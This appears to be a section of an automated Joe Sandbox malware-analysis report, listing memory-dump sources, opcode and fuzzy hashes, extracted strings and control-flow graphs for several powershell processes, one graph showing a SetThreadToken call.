                                                                                                                                                                                                                          • Opcode ID: e16a5ca632a9f90adca7ae3f15235a1422efcc6efb0f2f8815112b49369724db
                                                                                                                                                                                                                          • Instruction ID: 5118fbbb011f3336981a1adb340edd48ddf3ecffa957ff3392e1d16ffbf204aa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e16a5ca632a9f90adca7ae3f15235a1422efcc6efb0f2f8815112b49369724db
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1E04F31E19247CBCB08EFA4D48546ABFB1FF65205B104195E94997351E7305854CB85
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                          • Instruction ID: a2d8eed3a5943f04ad5619105c2428a0566ae510b9d298c2a983eac5ffb1fe67
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0D06270D042099F8780EFADC94156DFBF4EB48210F5085AAC919E7301F7315612DBD1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: bd36e432e6603a26031e5c6c2f5558614826b65ade25d84828b685e9ca6e1220
                                                                                                                                                                                                                          • Instruction ID: 58922ca9cb84fe314191e6b5b4e9e413b31b657023f36f582914b4c8ee3c7019
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd36e432e6603a26031e5c6c2f5558614826b65ade25d84828b685e9ca6e1220
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0D0673190411A8BCB0CABA5E85B4BDBF74FB14301F404169DA1792290EA352A5ACAC5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
• API String ID:
• Opcode ID: f735945de095f38d611e2afa18d01062697cb322220bb905bbc3fb75396e79aa
• Instruction ID: 8ea12f8f87938a797ca1b69cd4a58be11d5c1ac4b95a4e6bba835450b7c1f624
• Opcode Fuzzy Hash: f735945de095f38d611e2afa18d01062697cb322220bb905bbc3fb75396e79aa
• Instruction Fuzzy Hash: 30D01730E0820A8BCB18EFA4E84A86EBFB5BB44201F004169DA0993340EA346D01CBC1
Memory Dump Source
• Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 77a621a7f53d9a44a500362f13609b918c97ca0f6326cb41672b00b9c6ad2221
• Instruction ID: bfdec6517773ee8f611acdc79d67697f8b5c3dc925ae56b9f63361495033a979
• Opcode Fuzzy Hash: 77a621a7f53d9a44a500362f13609b918c97ca0f6326cb41672b00b9c6ad2221
• Instruction Fuzzy Hash: B8C08C1091C3D10FEF0343300C750227FF04D4734130A95C2C9C19B2B3C8148841D382
Memory Dump Source
• Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f6cf24a1db8dd891d67f60878ae189a623f4719e16f653c7d10b8589076dfebe
• Instruction ID: b701bf41c11af9bc2389f121542b7a91c5f2ee8a45514c56aa45dc8ce1b403d4
• Opcode Fuzzy Hash: f6cf24a1db8dd891d67f60878ae189a623f4719e16f653c7d10b8589076dfebe
• Instruction Fuzzy Hash: B6D092341092C48FC3060BB494344A13F719F4321632A68DAD8D98F6B3CA266847DB50
Memory Dump Source
• Source File: 00000005.00000002.1555051365.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4e70000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: db5e4ebf3906c0ada9a2858e6b6b02682a4d1d0f2cd3f77c3de9fcc9629100f9
• Instruction ID: a4653e0a756652493db422f4e53ffd4ac9cf3b230dd6b266ac998612e54758cd
• Opcode Fuzzy Hash: db5e4ebf3906c0ada9a2858e6b6b02682a4d1d0f2cd3f77c3de9fcc9629100f9
• Instruction Fuzzy Hash: C0B09230044708CFC2486FB5A4049157729AB4022639004A9ED1E4A6939E3BE886CE44
Strings
Memory Dump Source
• Source File: 00000005.00000002.1562192530.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_79f0000_powershell.jbxd
Similarity
• API ID:
• String ID: 84l$84l$Jl$Jl$Jl$Jl$Jl$rl$rl
• API String ID: 0-2781278049
• Opcode ID: 8c108d3c2eff1bd5cecd34efc7bc936dadff84130c4c3e2d972d0e177c1ba810
• Instruction ID: b232f8f9b0e1506f44877a14caa47a4da595c9deff74f9e069d0e1b82a836571
• Opcode Fuzzy Hash: 8c108d3c2eff1bd5cecd34efc7bc936dadff84130c4c3e2d972d0e177c1ba810
• Instruction Fuzzy Hash: F6D128B1B0430ACFC7259B6894007AABBB6AFC6315F28C4BBDA55CB251DB31C855C7E1
Strings
Memory Dump Source
• Source File: 00000005.00000002.1562192530.00000000079F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_79f0000_powershell.jbxd
Similarity
• API ID:
• String ID: Jl$Jl$Jl$Jl$Jl$Jl
• API String ID: 0-3334521869
• Opcode ID: a14193c185383744035e51cf3074b03971fe1670d00191f389e0a892e427e97e
• Instruction ID: 844be315842072045fe40bc69c1903d40b744016c7654e6de43c55e282b4772f
• Opcode Fuzzy Hash: a14193c185383744035e51cf3074b03971fe1670d00191f389e0a892e427e97e
• Instruction Fuzzy Hash: 8E4121B660D7818FC32687384C1179A7F766FC3604B1984ABC6409F6A3D6358C65C3A6
Memory Dump Source
• Source File: 00000007.00000002.1616475667.0000000002C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c1d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e079124c55992913e41f10b685eee39644e6886801ab44bb1d6fee26fcdc85c
• Instruction ID: 6fe160c85bc1f27625d329fc5239f7fe0ef722c932f0e8297e2c0c1a431e0083
• Opcode Fuzzy Hash: 0e079124c55992913e41f10b685eee39644e6886801ab44bb1d6fee26fcdc85c
• Instruction Fuzzy Hash: B6015E7140E3C49FD7128B258894B52BFB4DF47224F1D80DBD9888F1A3C2695849DBB2
Memory Dump Source
• Source File: 00000007.00000002.1616475667.0000000002C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C1D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c1d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f54e2060f1d555bf276cdb1d565157adbfe1140ea7ae9bcb1cff0eec6d7111d9
• Instruction ID: dc7c58be45e8895bec7d78881727ddb61013bd76dbb06b9bcf958348f8664c2d
• Opcode Fuzzy Hash: f54e2060f1d555bf276cdb1d565157adbfe1140ea7ae9bcb1cff0eec6d7111d9
• Instruction Fuzzy Hash: C501F7714043449AE7104A16CCC1B67BFD8EF82625F18C019ED4A0B182C7789941DBF2
Memory Dump Source
• Source File: 00000007.00000002.1616847937.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2c80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eac80501c629c25455f7cc1c321760d769f01e401184cd930abf05e677dbb153
• Instruction ID: c73747a16a70ab9a4ebf5471d4c4079f5dc23727768204c9a78314555dd829c3
• Opcode Fuzzy Hash: eac80501c629c25455f7cc1c321760d769f01e401184cd930abf05e677dbb153
• Instruction Fuzzy Hash: 09F03A35A001049FDB05CF9CD890AEEF7B1FF88324F208159E515A72A0C732EC52CB50

Execution Graph

Execution Coverage: 6.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
execution_graph 21913 8cc7560 21914 8cc75a3 SetThreadToken 21913->21914 21915 8cc75d1 21914->21915

Control-flow Graph

control_flow_graph 480 4beb490-4beb4a9 481 4beb4ae-4beb7f5 call 4beacbc 480->481 482 4beb4ab 480->482 482->481
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID: {YCn^$YCn^
• API String ID: 0-3695118941
• Opcode ID: 373b3130d8608cccf031b33a380dce65bfb05bb6413563daa58f0a343ff17eed
• Instruction ID: 4f9c6930311588ae41eaeefbe007a166922378abc20ec24b5ea96ff7f91261d4
• Opcode Fuzzy Hash: 373b3130d8608cccf031b33a380dce65bfb05bb6413563daa58f0a343ff17eed
• Instruction Fuzzy Hash: CE919E71B007159BEB19EFF688506AFBBE2EFC4600B04892DD906AB344DF356E058BD5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1611852418.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ad0000_powershell.jbxd
Similarity
• API ID:
• String ID: $aal$,Sl$,Sl$Jl$Jl$Jl$Jl$Jl$Jl$Rl$Rl$rl$rl
                                                                                                                                                                                                                          • API String ID: 0-3520819111
                                                                                                                                                                                                                          • Opcode ID: c6f4a1c005997d6e4a3894bf2a67c3730e7e3ae0b3281ffb55477d35891fa988
                                                                                                                                                                                                                          • Instruction ID: 9c3c7748793e182ebeb620cfcbc02c4ee047cb6e264c3d6bf378620ded19311f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6f4a1c005997d6e4a3894bf2a67c3730e7e3ae0b3281ffb55477d35891fa988
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8B22AB1B04306DFDB259F6898017AABBF1BFC6211F14807AD966CB291DB35CD41C7A2

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 544 8cc7560-8cc75cf SetThreadToken 546 8cc75d8-8cc75f5 544->546 547 8cc75d1-8cc75d7 544->547 547->546
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1614954774.0000000008CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CC0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_8cc0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ThreadToken
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3254676861-0
                                                                                                                                                                                                                          • Opcode ID: 390532fa626683ddfd4e2908e343cb61f7de3a154a4a5cabe4200cdfcba5b5bb
                                                                                                                                                                                                                          • Instruction ID: 31bd4402f4cf609a9e5c80eaf68c6525b83483063142cbd087bb37540f69e763
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 390532fa626683ddfd4e2908e343cb61f7de3a154a4a5cabe4200cdfcba5b5bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB1136B5D003498FDB10DF9AC884B9EFBF8EF88220F14841AD518A3350C778A944CFA0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 550 8cc755e-8cc759b 551 8cc75a3-8cc75cf SetThreadToken 550->551 552 8cc75d8-8cc75f5 551->552 553 8cc75d1-8cc75d7 551->553 553->552
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1614954774.0000000008CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CC0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_8cc0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ThreadToken
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3254676861-0
                                                                                                                                                                                                                          • Opcode ID: 6487c9338133d6f8c6a21ea3c78cb7a065605fe0ed337452013e05d589e5f531
                                                                                                                                                                                                                          • Instruction ID: c56ad3f8c79469625511a4a02a623291f5f32b0e98ac7bb4b6141f984f3bb8bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6487c9338133d6f8c6a21ea3c78cb7a065605fe0ed337452013e05d589e5f531
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B81125B59002498FDB10DF9AC584BDEFBF4EB88224F14841AE118A7650C778A944CFA0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 556 4bee5b9-4bee5ba 557 4bee5bc-4bee5c0 556->557 558 4bee5c4-4bee5cb 556->558 559 4bee622-4bee630 557->559 560 4bee5c2 557->560 561 4bee5cc-4bee602 558->561 562 4bee632 559->562 563 4bee693-4bee6b6 559->563 560->558 560->561 564 4bee63c 562->564 565 4bee634-4bee636 562->565 578 4bee6bc-4bee6d3 563->578 579 4bee73a-4bee753 563->579 569 4bee640-4bee643 564->569 568 4bee638-4bee63a 565->568 565->569 568->564 571 4bee644-4bee689 568->571 569->571 571->563 585 4bee6db-4bee738 578->585 582 4bee75e 579->582 583 4bee755 579->583 584 4bee75f 582->584 583->582 584->584 585->578 585->579
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Jl
                                                                                                                                                                                                                          • API String ID: 0-143229547
                                                                                                                                                                                                                          • Opcode ID: 68377f42e1d9d712a20a4c14616a9b6f627a42b56242fa011922a0f6765057bd
                                                                                                                                                                                                                          • Instruction ID: f299e644202bafd10a5736d43c7a0317657bcf1c4e9f717c8b9331b778fd61ee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68377f42e1d9d712a20a4c14616a9b6f627a42b56242fa011922a0f6765057bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB41AD70A00205DFDB14DFBAD494AAEBBF2FF89305F1881A9D415AB391DB34AD05CB91

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 593 4bee610-4bee612 594 4bee61c-4bee630 593->594 595 4bee614-4bee61a 593->595 597 4bee632 594->597 598 4bee693-4bee6b6 594->598 595->594 599 4bee63c 597->599 600 4bee634-4bee636 597->600 609 4bee6bc-4bee6d3 598->609 610 4bee73a-4bee753 598->610 603 4bee640-4bee643 599->603 602 4bee638-4bee63a 600->602 600->603 602->599 604 4bee644-4bee689 602->604 603->604 604->598 616 4bee6db-4bee738 609->616 613 4bee75e 610->613 614 4bee755 610->614 615 4bee75f 613->615 614->613 615->615 616->609 616->610
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Jl
                                                                                                                                                                                                                          • API String ID: 0-143229547
                                                                                                                                                                                                                          • Opcode ID: f44beff4464905cdb1b7f2ab164d4484a9f374fbcc3259afa680f2c2a9495247
                                                                                                                                                                                                                          • Instruction ID: 3878d4fbe6ba43808804fa18338648d0ec6090fabdefa8a1082b2ccfeb9205f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f44beff4464905cdb1b7f2ab164d4484a9f374fbcc3259afa680f2c2a9495247
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B841C070A00205DFDB15DF7AD494AAEBBF2FF89601F1881A9D415AB391DB34BC04CBA1

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 624 4bee640-4bee6b6 632 4bee6bc-4bee6d3 624->632 633 4bee73a-4bee753 624->633 639 4bee6db-4bee738 632->639 636 4bee75e 633->636 637 4bee755 633->637 638 4bee75f 636->638 637->636 638->638 639->632 639->633
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Jl
                                                                                                                                                                                                                          • API String ID: 0-143229547
                                                                                                                                                                                                                          • Opcode ID: 71f6fc8d1e4fc04e25b25fcdc372f03d5cada3cbe762a2bbc80a066315c76ab4
                                                                                                                                                                                                                          • Instruction ID: 780ae5a8059de76f92d8535f4a898b49dfa4f79569ccef548a3961ea0a08845d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71f6fc8d1e4fc04e25b25fcdc372f03d5cada3cbe762a2bbc80a066315c76ab4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C318D30A00205CFCB14DF7AD494AAEBBF2FF88305F148569D816AB394DB34AD04CBA1

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 647 4bedc88-4bedc8a 648 4bedc8c-4bedc92 647->648 649 4bedc94 647->649 648->649 650 4bedc9c-4bedcad 648->650 651 4bedd0d-4bede36 649->651 652 4bedc96 649->652 659 4bedcaf 650->659 660 4bedcb6-4bedcc8 650->660 654 4bedc98-4bedc9b 652->654 655 4bedca0-4bedcad 652->655 654->650 655->660 661 4bedcae-4bedcaf 655->661 659->660 664 4bedcca call 4bedc88 660->664 665 4bedcca call 4bedce8 660->665 666 4bedcca call 4bedcd9 660->666 661->660 663 4bedcd0-4bedcd3 664->663 665->663 666->663
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: +/Cn^
                                                                                                                                                                                                                          • API String ID: 0-76185464
                                                                                                                                                                                                                          • Opcode ID: f900ce7fbab9fd065cbeb7cbe96562058064ac3cdf5ec29916ca88296a263517
                                                                                                                                                                                                                          • Instruction ID: 8c2dcb3c43956ec2cf77ace8298f1285db41a42dd72c747d13110f8cbe644c0c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f900ce7fbab9fd065cbeb7cbe96562058064ac3cdf5ec29916ca88296a263517
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F046362007069FDB1A261BA800AFE7B5EDAC92F230440E7E809CF301EBA0A80156F5

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID: +/Cn^
• API String ID: 0-76185464
• Opcode ID: 6ffe7c4b781d8dc4b2cea584c92a23f5e415dfba9feed7e4855307353047a619
• Instruction ID: 78e537c2447db8588c97d3902b01acfb932541a8775c747c26644e42f1544653
• Opcode Fuzzy Hash: 6ffe7c4b781d8dc4b2cea584c92a23f5e415dfba9feed7e4855307353047a619
• Instruction Fuzzy Hash: C8E08631700711478215671FA40045F76DFDEC55B6314446ED41987340DFA4EC0147D5

Control-flow Graph

Memory Dump Source
• Source File: 0000000A.00000002.1611852418.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ad0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 62448550f8006aefc6df13bb85c19a924acd8984b8eb7bca4013c9746297757a
• Instruction ID: 8008c4f28fb1ec17e8bf60248fe6873023119ce5441a00e334536d96a2efd5ac
• Opcode Fuzzy Hash: 62448550f8006aefc6df13bb85c19a924acd8984b8eb7bca4013c9746297757a
• Instruction Fuzzy Hash: 0D126CB1704356CFDB159B6894017AABBB2AFCA211F24C07AD926CF381DB31CD45C792

Control-flow Graph

Memory Dump Source
• Source File: 0000000A.00000002.1611852418.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ad0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7a622c078f9f6326e41477f7212163142076784ed88820891315c75a1793511b
• Instruction ID: 6f495f4ac850ddb68ba663a39812db1f36404f08bc7da50d30aea8252eec5b40
• Opcode Fuzzy Hash: 7a622c078f9f6326e41477f7212163142076784ed88820891315c75a1793511b
• Instruction Fuzzy Hash: 3FB128B1B0021ADFDB159B69D4007AABBF2EFC6211F15C07AE426CB251DB31DD51C7A1

Control-flow Graph

Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e5a369b861b974da83182829d797e44aa87be8e0c806f828fb1f4f2e6ff6a63
• Instruction ID: b9cae1b6eafdfb9e3ddeee8eb573034f61cf1297b472f1e773933acba2250c6a
• Opcode Fuzzy Hash: 8e5a369b861b974da83182829d797e44aa87be8e0c806f828fb1f4f2e6ff6a63
• Instruction Fuzzy Hash: BA918D74A006098FCB19CF59C494ABEFBB6FF88310B248699D815AB365C735FC51DBA0
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cc4d6699a66d5f36ffb66d9091be577e111c1f34461cda056ef3ec80d1816abc
• Instruction ID: e0df1e044721f235c2046d919e8711e0a4273cf80b54a46f1805a726ce647661
• Opcode Fuzzy Hash: cc4d6699a66d5f36ffb66d9091be577e111c1f34461cda056ef3ec80d1816abc
• Instruction Fuzzy Hash: E6612671E052499FDB14DFAAC484B9DFBF5EF88310F14816AE819AB354EB34AD41CB60
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b27cd7f159974cdae1625df31f474ef3e929e46f04df806ecfdab66254d24441
• Instruction ID: f5e3f77be662e8395dd25faf2552b0b5dc0f850145315ce3f4d9868dcea4c656
• Opcode Fuzzy Hash: b27cd7f159974cdae1625df31f474ef3e929e46f04df806ecfdab66254d24441
• Instruction Fuzzy Hash: 1451AF317042059FE704DB6AD854A7AB7EAFFC9215B1444A9D509CB352EF35EC02CBA0
Memory Dump Source
• Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 879bb8a77c852c448aecb154e8929bdfad8922628c6b20f12707bbdd80bdb88b
• Instruction ID: 8c2431e4fb726c0b6b0f5726ec7e93f89574fc560b542255b29b216dc78814e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 879bb8a77c852c448aecb154e8929bdfad8922628c6b20f12707bbdd80bdb88b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE512971E052499FDB14DFAAC484B9DFBF5FF88310F14816AE819AB354EB34A845CB60
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 70d8accff6171ba6fd3be1b24167a086088879a9df36f3848100d4ce6cc2bd7b
                                                                                                                                                                                                                          • Instruction ID: ffdeae104074cba6a160977795ff5ee94699745e22cd79e10006825ce0a0e7ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70d8accff6171ba6fd3be1b24167a086088879a9df36f3848100d4ce6cc2bd7b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E514A747003058FEB14DF69C494A2EBBE6EFC8615B1485A9E809CF356EB34EC018B61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1596198751.0000000004BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4be0000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ba4dc7d38e4911d61f168b9162214d9eabb2368537d0a7bb06516c3ecd8d8b50
                                                                                                                                                                                                                          • Instruction ID: 9c4f7da8c1308aa3cef51e969153cbc99be8f4e3b840a912c80a5f66e8fcf00e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba4dc7d38e4911d61f168b9162214d9eabb2368537d0a7bb06516c3ecd8d8b50
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC4118747003058FEB14EF6DC594E2ABBE6EFC8615B5484A8E809CF355EB34ED018BA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.1611852418.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ad0000_powershell.jbxd
